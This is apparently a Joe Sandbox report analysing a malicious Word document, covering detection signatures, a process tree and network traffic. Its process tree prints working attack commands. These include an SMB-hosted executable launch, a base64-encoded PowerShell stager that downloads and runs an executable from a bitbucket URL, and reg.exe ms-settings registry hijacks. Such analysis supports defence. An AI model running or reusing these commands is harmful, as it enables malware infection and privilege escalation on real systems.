Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
42#U0430.doc

Overview

General Information

Sample name:42#U0430.doc
renamed because original name is a hash value
Original sample name: .doc
Analysis ID:1365471
MD5:de2e053acae98adbecc23ab3c0e9cf5d
SHA1:e404f9ff6a3d92fd7e153bb695be9c9eabc23d6c
SHA256:93aa6fc207df430a6e9833259e618895bcdb75c7db0850599d3dbb87d47a54c7
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Document Viewer accesses SMB path (likely to steal NTLM hashes or to download payload)
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Document exploit detected (process start blacklist hit)
Installs new ROOT certificates
Machine Learning detection for sample
Opens network shares
Powershell uses Background Intelligent Transfer Service (BITS)
Suspicious powershell command line found
Uses cmd line tools excessively to alter registry or file data
Very long command line found
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Document misses a certain OLE stream usually present in this Microsoft Office document type
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Stores large binary data to the registry
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 3204 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • explorer.exe (PID: 3292 cmdline: explorer.exe "\\89.23.98.22\LN\" MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
    • GB.exe (PID: 3444 cmdline: \\89.23.98.22\LN\GB.exe MD5: C3E7CFA2E076C3CA421DDC00496C71B5)
      • cmd.exe (PID: 3484 cmdline: cmd.exe /c res.bat && test2.exe MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
        • cmd.exe (PID: 3524 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo f " MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
        • xcopy.exe (PID: 3532 cmdline: xcopy /s test2.exe "C:\Users\user\AppData\Local\Temp\persistent2\test2.exe" MD5: 20CF8728C55A8743AAC86FB8D30EA898)
        • powershell.exe (PID: 3560 cmdline: powershell -Command "[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBEAGUAYwBvAG0AcAByAGUAcwBzAGUAZABCAHkAdABlAEEAcgByAGEAeQAgAHsACgAKACAAIAAgACAAIAAgACAAIABbAEMAbQBkAGwAZQB0AEIAaQBuAGQAaQBuAGcAKAApAF0ACgAgACAAIAAgAFAAYQByAGEAbQAgACgACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFsAUABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQAsAFYAYQBsAHUAZQBGAHIAbwBtAFAAaQBwAGUAbABpAG4AZQAsAFYAYQBsAHUAZQBGAHIAbwBtAFAAaQBwAGUAbABpAG4AZQBCAHkAUAByAG8AcABlAHIAdAB5AE4AYQBtAGUAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJAAoAFQAaAByAG8AdwAoACIALQBiAHkAdABlAEEAcgByAGEAeQAgAGkAcwAgAHIAZQBxAHUAaQByAGUAZAAiACkAKQAKACAAIAAgACAAKQAKACAAIAAgACAAIAAgACAAIABQAHIAbwBjAGUAcwBzACAAewAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFcAcgBpAHQAZQAtAFYAZQByAGIAbwBzAGUAIAAiAEcAZQB0AC0ARABlAGMAbwBtAHAAcgBlAHMAcwBlAGQAQgB5AHQAZQBBAHIAcgBhAHkAIgAKACAAIAAgACAAIAAgACAAIAAkAGkAbgBwAHUAdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACAALAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAApAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABvAHUAdABwAHUAdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAKACAAIAAgACAAIAAgACAAIAAkAGcAegBpAHAAUwB0AHIAZQBhAG0AIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAgACQAaQBuAHAAdQB0ACwAIAAoAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABnAHoAaQBwAFMAdAByAGUAYQBtAC4AQwBvAHAAeQBUAG8AKAAgACQAbwB1AHQAcAB1AHQAIAApAAoAIAAgACAAIAAgACAAIAAgACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbABvAHMAZQAoACkACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAaQBuAHAAdQB0AC4AQwBsAG8AcwBlACgAKQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAWwBiAHkAdABlAFsAXQBdACAAJABiAHkAdABlAE8AdQB0AEEAcgByAGEAeQAgAD0AIAAkAG8AdQB0AHAAdQB0AC4AVABvAEEAcgByAGEAeQAoACkACgAgACAAIAAgACAAIAAgACAAVwByAGkAdABlAC0ATwB1AHQAcAB1AHQAIAAkAGIAeQB0AGUATwB1AHQAQQByAHIAYQB5AAoAIAAgACAAIAB9AAoAfQAKAAoAWwBiAHkAdABlAFsAXQBdACAAJABiAHkAdABlAF8AYQByAHIAYQB5ACAAPQAgADMAMQAsADEAMwA5ACwAOAAsADAALAAwACwAMAAsADAALAAwACwANAAsADAALAAxADQAOQAsADEANAA0ACwAMQA5ADMALAAxADEANAAsADEAMwAwACwANAA4ACwAMgAwACwANgA5ACwAMQAyADcALAA0ADEALAA5ADYALAAxADAAOQAsADEAOQA5ACwAMQAzADMALAAxADEALAA1ACwAMQA0ADYALAA5ACwAMwA1ACwAMQA3ADcALAAyACwAMQAyADUALAA5ACwAMQAxADEALAAxADAAMwAsADYANgAsADcALAAxADcAMQAsADEAMgA5ACwANAA2ACwANgA4ACwANwA3ACwAMgA0ADgALAAyADUAMAAsADcAMAAsADEAOAA2ACwAMgAzADkALAA3ADYALAAxADEAOQAsADEAMQAxACwAMQAxADMALAAyADMAMQAsADEANQA4ACwAMgA0ADMALAAxADcANAAsADIAMwAzACwAOQA3ACwAMgAyADQALAAxADQAMAAsADkANAAsADQAOAAsADIAMQA3ACwAMgA0ADIALAAxADMAOAAsADgALAA4ADAALAA4ADQALAAyADIAMAAsADEAMQAzACwANAAwACwAMgAzACwAMQA0ADEALAAyADAAMgAsADEANwAzACwAMgAwADIALAAxADkANgAsADEAOAAxACwAOAAxACwAOQA4ACwANgA2ACwAMwA3ACwAMgAwADQALAAxADcANAAsADkANQAsADEANAAxACwAMgA0ACwAMQA4ADUALAAyADUAMAAsADIAMAAwACwAMgAyADQALAAxADcAMAAsADEANgA5ACwAMQAyADMALAA1ADUALAAxADIALAAxADEAMAAsADEAMwA4ACwAMQAzADcALAAxADgANwAsADEANQAwACwAMgAwADkALAA3ADMALAAyADQANwAsADEAMwA1ACwAMQAxADAALAAyADMALAAzADEALAAxADgANgAsADEANQA2ACwAMgAwACwAMQA3ADUALAAxADMAOAAsADYANgAsADIAMAAwACwAMgAzADEALAAxADQANwAsADIAMAAyACwAMQAwADQALAA4ADYALAAxADIANwAsADIAMQA2ACwAMQAyADUALAAxADYANQAsADkANAAsADkAMgAsADEAOAA0ACwAMwAxACwAMwA4ACwANAAzACwANwA5ACwANAA1ACwAMQA2ADMALAAxADYANgAsADEAMAAyACwAMQA3ADEALAAxADEANQAsADMANQAsADEANQA3ACwAMQAsADYALAAxADYAMwAsADEANgAxACwAMgAzADgALAAyADQAMQAsADIAMAA0ACwAMwAwACwAMQA0ADkALAAzADIALAA0ADAALAAxADUAMQAsADEANgA0ACwAMQA3ADYALAAxADQAMgAsADQALAAyADIALAA0ADEALAAxADkAMAAsADEANQAwACwAMgA0ADYALAAxADQANwAsADEAMgA1ACwAMQAyACwANgAwACwAOAA5ACwAMgA0ADUALAA2ADAALAAyADkALAA2ADEALAA3ADQALAAyADEAMQAsADUAMwAsADEANwA4ACwAMQA4ADgALAAyADQAMAAsADEANgA0ACwAMgA1ADMALAAyADEAMQAsADgAMQAsADEANwAxACwAOQA4ACwANQAyACwANAA5ACwAMQA0ADQALAAxADUAMAAsADIAMQA3ACwAMgA3ACwANAA2ACwAMQAzADIALAA1ADcALAA0ADQALAAxADkAMgAsADYANwAsADEANQAsADYAMgAsADIANAA3ACwAMQA1ADUALAA1ADkALAAzADgALAAxADUANQAsADkANwAsADIANQA0ACwAMQA5ADMALAAxADUANQAsADIAMgA0ACwAMgAxADgALAAxADEANgAsADEAMgAzACwAMQA5ADEALAAyADMANwAsADEAMQA3ACwAOQAyACwAMQAyADYALAAxADYAMwAsADEAMgA0ACwANQA4ACwAMgA0ADAALAAyADcALAAxADcAMAAsADEANAA3ACwAMgAyADEALAA3ADEALAAxADMAMAAsADEAMwAyACwANwA4ACwAMQA3ADgALAAzACwAMQAxADMALAA2ADkALAA5ACwAMQA1ACwAMQA1ADgALAA2ADgALAAxADkALAA3ADkALAAxADMAOQAsADUANQAsADUAMQAsADEAMQAxACwAOAA0ACwAOQAwACwAMgAwADUALAAxADIAOAAsADkANgAsADEAOAAxACwAMgA1ACwAMQA3ADAALAAxADAAOAAsADcANgAsADEALAA5ADIALAAxADcAMwAsADkAOQAsADMANgAsADEAMAA5ACwANwA2ACwANgAxACwAMQAzADAALAA3ADUALAA1ADMALAAxADYAMwAsADgAMwAsADkANgAsADcAOQAsADQAMgAsADgAOQAsADEAMwA0ACwANwA3ACwAOQAwACwANQAxACwANQAxACwAMgAwADcALAAxADkAMQAsADIAMwA4ACwAMgA0ACwANQA0ACwANgA3ACwAOAA1ACwAMgAxADgALAAyADUANQAsADIANQAwACwAMgAwADcALAAyADkALAAyADIAMQAsADEAMgAyACwAMgA1ADMALAAzACwANAAsADEANwA4ACwAMgA1ADMALAAxADcANAAsADEANgA0ACwAMQAsADAALAAwAAoAJABkAGUAYwBvAG0AcAByAGUAcwBzAGUAZABCAHkAdABlAEEAcgByAGEAeQAgAD0AIABHAGUAdAAtAEQAZQBjAG8AbQBwAHIAZQBzAHMAZQBkAEIAeQB0AGUAQQByAHIAYQB5ACAALQBiAHkAdABlAEEAcgByAGEAeQAgACQAYgB5AHQAZQBfAGEAcgByAGEAeQAKAAoAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAgACQAZABlAGMAbwBtAHAAcgBlAHMAcwBlAGQAQgB5AHQAZQBBAHIAcgBhAHkAIAApACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApACkAKQAgAHwAIABJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4ACgAKAAoAdwBnAGUAdAAgACIAaAB0AHQAcABzADoALwAvAGIAaQB0AGIAdQBjAGsAZQB0AC4AbwByAGcALwBvAGwAZQBnAG8AdgBpAGMAaAAtADAAMAA3AC8ANwA3ADcALwBkAG8AdwBuAGwAbwBhAGQAcwAvAHcAcwB1AHMAYwByAC4AZQB4AGUAIgAgAC0AbwB1AHQAZgBpAGwAZQAgACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAB3AHMAdQBzAGMAcgAuAGUAeABlACIACgBJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AIAAtAEMAbwBtAG0AYQBuAGQAIAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwAdwBzAHUAcwBjAHIALgBlAHgAZQAiAA==')) | Invoke-Expression" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
          • reg.exe (PID: 3720 cmdline: "C:\Windows\system32\reg.exe" add HKCU\Software\Classes\.omg\Shell\Open\command /d C:\Users\ADMINI~1\AppData\Local\Temp\persistent2\test2.exe /f MD5: 9D0B3066FE3D1FD345E86BC7BCCED9E4)
          • reg.exe (PID: 3728 cmdline: "C:\Windows\system32\reg.exe" add HKCU\Software\Classes\ms-settings\CurVer /d .omg /f MD5: 9D0B3066FE3D1FD345E86BC7BCCED9E4)
          • reg.exe (PID: 4056 cmdline: "C:\Windows\system32\reg.exe" delete HKCU\Software\Classes\.omg\ /f MD5: 9D0B3066FE3D1FD345E86BC7BCCED9E4)
          • reg.exe (PID: 4064 cmdline: "C:\Windows\system32\reg.exe" delete HKCU\Software\Classes\ms-settings\ /f MD5: 9D0B3066FE3D1FD345E86BC7BCCED9E4)
    • powershell.exe (PID: 3476 cmdline: powershell.exe -Command Stop-Process -Name explorer MD5: A575A7610E5F003CC36DF39E07C4BA7D)
  • explorer.exe (PID: 3340 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
  • explorer.exe (PID: 3740 cmdline: explorer.exe MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
    • rundll32.exe (PID: 1132 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\ MD5: DD81D91FF3B0763C392422865C9AC12E)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 3560INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0xb23:$b2: ::FromBase64String(
  • 0x5df3:$b2: ::FromBase64String(
  • 0x19aa6:$b2: ::FromBase64String(
  • 0x41497:$b2: ::FromBase64String(
  • 0x42c12:$b2: ::FromBase64String(
  • 0x4459d:$b2: ::FromBase64String(
  • 0x4a964:$b2: ::FromBase64String(
  • 0x4c0dc:$b2: ::FromBase64String(
  • 0x60ac2:$b2: ::FromBase64String(
  • 0x69d02:$b2: ::FromBase64String(
  • 0x6e429:$b2: ::FromBase64String(
  • 0x6fba4:$b2: ::FromBase64String(
  • 0x71e6b:$b2: ::FromBase64String(
  • 0xacb82:$b2: ::FromBase64String(
  • 0xad125:$b2: ::FromBase64String(
  • 0xb0309:$b2: ::FromBase64String(
  • 0xb2f1d:$b2: ::FromBase64String(
  • 0xb4f83:$b2: ::FromBase64String(
  • 0xb66fb:$b2: ::FromBase64String(
  • 0xb884a:$b2: ::FromBase64String(
  • 0xb9fc2:$b2: ::FromBase64String(

Sigma Signatures

No Sigma rule has matched

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: 42#U0430.docAvira: detected
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\~DF23BD85EE3DE97CB5.TMPAvira: detection malicious, Label: HEUR/Macro.Downloader.AMAK.Gen
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\test2.exeVirustotal: Detection: 11%Perma Link
Source: C:\Users\user\AppData\Local\Temp\persistent2\test2.exeVirustotal: Detection: 11%Perma Link
Multi AV Scanner detection for submitted file
Source: 42#U0430.docVirustotal: Detection: 41%Perma Link
Machine Learning detection for sample
Source: 42#U0430.docJoe Sandbox ML: detected
Source: unknownHTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.22:49164 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: Binary string: CallSite.Target.pdb source: powershell.exe, 0000000B.00000002.391663210.000000001C5D6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wextract.pdbH source: GB.exe, 00000004.00000002.393088212.000000013F041000.00000020.00000001.01000000.00000008.sdmp
Source: Binary string: wextract.pdb source: GB.exe, 00000004.00000002.393088212.000000013F041000.00000020.00000001.01000000.00000008.sdmp, GB.exe, 00000004.00000003.364191812.0000000002AF0000.00000004.00000020.00020000.00000000.sdmp, test2.exe.4.dr, test2.exe.10.dr
Source: Binary string: wextract.pdbGCTL source: GB.exe, 00000004.00000003.364191812.0000000002AF0000.00000004.00000020.00020000.00000000.sdmp, test2.exe.4.dr, test2.exe.10.dr
Source: Binary string: b.pdbpdblib.pdb source: powershell.exe, 0000000B.00000002.391663210.000000001C52D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: gement.Automation.pdb source: powershell.exe, 0000000B.00000002.391663210.000000001C52D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdberShell.Commands.Utility.pdb source: powershell.exe, 0000000B.00000002.391188462.000000001A59F000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities

barindex
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\explorer.exe
Source: global trafficDNS query: name: bitbucket.org
Source: global trafficDNS query: name: bbuseruploads.s3.amazonaws.com
Source: global trafficDNS query: name: bbuseruploads.s3.amazonaws.com
Source: global trafficDNS query: name: bbuseruploads.s3.amazonaws.com
Source: global trafficDNS query: name: bbuseruploads.s3.amazonaws.com
Source: global trafficDNS query: name: bbuseruploads.s3.amazonaws.com
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.192.141.1:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.192.141.1:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.192.141.1:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.192.141.1:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.192.141.1:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.192.141.1:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.192.141.1:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.192.141.1:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.192.141.1:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.192.141.1:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.192.141.1:443
Source: global trafficTCP traffic: 104.192.141.1:443 -> 192.168.2.22:49164
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.192.141.1:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.192.141.1:443
Source: global trafficTCP traffic: 104.192.141.1:443 -> 192.168.2.22:49164
Source: global trafficTCP traffic: 104.192.141.1:443 -> 192.168.2.22:49164
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.192.141.1:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.192.141.1:443
Source: global trafficTCP traffic: 104.192.141.1:443 -> 192.168.2.22:49164
Source: global trafficTCP traffic: 104.192.141.1:443 -> 192.168.2.22:49164
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.192.141.1:443
Source: global trafficTCP traffic: 104.192.141.1:443 -> 192.168.2.22:49164
Source: global trafficTCP traffic: 104.192.141.1:443 -> 192.168.2.22:49164
Source: global trafficTCP traffic: 104.192.141.1:443 -> 192.168.2.22:49164
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.192.141.1:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.192.141.1:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.192.141.1:443
Source: winword.exeMemory has grown: Private usage: 0MB later: 58MB
Source: Joe Sandbox ViewIP Address: 104.192.141.1 104.192.141.1
Source: Joe Sandbox ViewIP Address: 104.192.141.1 104.192.141.1
Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: global trafficHTTP traffic detected: GET /olegovich-007/777/downloads/wsuscr.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.1; en-US) WindowsPowerShell/5.1.14409.1005Host: bitbucket.orgConnection: Keep-Alive
Source: unknownHTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.22:49164 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B8B30889-A67A-4198-8B3E-84A745ECA427}.tmpJump to behavior
Source: global trafficHTTP traffic detected: GET /olegovich-007/777/downloads/wsuscr.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.1; en-US) WindowsPowerShell/5.1.14409.1005Host: bitbucket.orgConnection: Keep-Alive
Source: powershell.exe, 0000000B.00000002.391663210.000000001C4FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknownDNS traffic detected: queries for: bitbucket.org
Source: powershell.exe, 0000000B.00000002.385447053.0000000002C29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bitbucket.org
Source: powershell.exe, 0000000B.00000002.391663210.000000001C4FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 0000000B.00000002.391663210.000000001C4FB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.391663210.000000001C491000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: powershell.exe, 0000000B.00000002.391663210.000000001C4FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: powershell.exe, 0000000B.00000002.391663210.000000001C4FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
Source: powershell.exe, 0000000B.00000002.391188462.000000001A5E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 0000000B.00000002.391663210.000000001C4FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: powershell.exe, 0000000B.00000002.391663210.000000001C4AF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.391663210.000000001C4FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: powershell.exe, 0000000B.00000002.385447053.0000000003843000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
Source: explorer.exe, 0000000E.00000002.633066156.0000000003C29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://java.co
Source: explorer.exe, 0000000E.00000002.632856147.00000000001AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com
Source: powershell.exe, 00000005.00000002.376805682.0000000012341000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.374553660.0000000002519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000B.00000002.391663210.000000001C4FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
Source: powershell.exe, 0000000B.00000002.391663210.000000001C4FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
Source: powershell.exe, 0000000B.00000002.391663210.000000001C4FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
Source: powershell.exe, 0000000B.00000002.391663210.000000001C4FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
Source: powershell.exe, 0000000B.00000002.391663210.000000001C491000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
Source: powershell.exe, 0000000B.00000002.391663210.000000001C4FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
Source: powershell.exe, 0000000B.00000002.391663210.000000001C4FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
Source: powershell.exe, 00000005.00000002.374553660.0000000002311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.385447053.0000000002351000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 0000000E.00000002.632856147.00000000001AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3
Source: powershell.exe, 0000000B.00000002.391663210.000000001C4FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: powershell.exe, 0000000B.00000002.391663210.000000001C4AF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.391663210.000000001C4FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: explorer.exe, 0000000E.00000002.633066156.0000000003C29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccl
Source: explorer.exe, 0000000E.00000002.633272083.0000000006FD2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.632976759.000000000266A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.632976759.0000000002580000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.633066156.0000000003C29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 0000000E.00000002.632976759.000000000266A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleaner)
Source: explorer.exe, 0000000E.00000002.633272083.0000000006FD2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.632976759.0000000002580000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 0000000E.00000002.633066156.0000000003C29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerv
Source: powershell.exe, 0000000B.00000002.385447053.0000000002C29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.385447053.0000000002C5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.385447053.0000000002C64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aui-cdn.atlassian.com/
Source: powershell.exe, 0000000B.00000002.385447053.0000000002C64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com
Source: powershell.exe, 0000000B.00000002.385447053.0000000002C29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.385447053.0000000002C5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.385447053.0000000002C64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/7ea556d7-c0f5-4b27-9352-362ff0b0d6cb/downloads/2850b0f6-002e-
Source: powershell.exe, 0000000B.00000002.385447053.0000000002C13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org
Source: powershell.exe, 0000000B.00000002.385447053.0000000002C9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/o
